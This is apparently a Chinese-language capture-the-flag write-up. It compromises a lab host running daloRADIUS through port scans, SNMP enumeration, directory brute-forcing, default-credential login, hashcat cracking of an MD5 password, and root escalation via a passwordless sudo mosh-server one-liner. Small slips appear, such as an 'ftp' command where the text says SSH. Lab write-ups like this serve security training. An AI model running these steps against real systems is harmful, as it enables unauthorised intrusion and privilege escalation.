# 信息收集
渗透前先进行好信息收集准备,先用 nmap 看看 TCP 端口信息
sudo nmap -A 10.10.11.48 |
发现有 ssh 和 http 服务,其中 ssh 不存在匿名登录,查看 http 内容似乎也没有什么可以入手的地方
扫完 TCP 端口,那接下来就去看看 UDP 端口
sudo nmap -sC -sV -sU 10.10.11.48 |
发现 161 端口有 snmp 服务,而且存在 radius 协议
利用 snmpwalk,snmp 工具套件中的一个命令,通过遍历 snmp 设备的管理信息库来获取信息
snmpwalk -v 2c -c public 10.10.11.48 |
枚举系统信息成功发现 radius 服务器管理工具,目录扫描启动
dirsearch -u http://10.10.11.48/daloradius |
先去看看扫出来的文件里有没有可以利用的信息
.gitignore 涵盖了不希望被 git 跟踪的文件和目录
changeLog 记录项目中的所有更改历史
docker-compose.ymldocker 的配置文件
wow,含有 mysql 的数据库名和账密,也算是重要信息
后面的许可证和 readme 就省略了
接下来还是进行信息搜集,之前 dirsearch 还扫描出了下级目录,寻找一下能利用的点
先从 /app 开始
dirsearch -u http://10.10.11.48/daloradius/app |
扫出了 login.php! 总算是找到入口了?
有点搞笑了,还不是弱口令,想着继续找找吧,但是后面扫出的目录基本都是 301,一时间卡住了
后面被 wp 启发了思路,换用字典去爆破目录
dirsearch -u http://10.10.11.48/daloradius/app -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
还有一个 /operators 目录偷偷藏着,继续扫
dirsearch -u http://10.10.11.48/app/operators |
(漏截图了,扫出来还有一个 login.php)
可以看到最下面有 daloRADIUS 的小标,了解到是会存在默认账密这件事情
成功登陆
看到有用户列表,心心念念的账密这不就来了
拿到的密码显然是加密的,用 hashcat 去破解一下
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt |
密码明文为 underwaterfriends
想到还有 ssh 服务没试,这下去尝试登陆一下
ftp svcMosh@10.10.11.48 |
芜湖,这不就进去了,直接拿下 user flag
# 提权
还剩下 root flag,想要拿到得要提权
sudo -l |
显示一下我们能用的 sudo 命令,发现有 mosh,并且允许用户在不输密码的情况下以 root 运行,这 mosh 提权不就来了
mosh --server="sudo /usr/bin/mosh-server" localhost |
拿到最后的 flag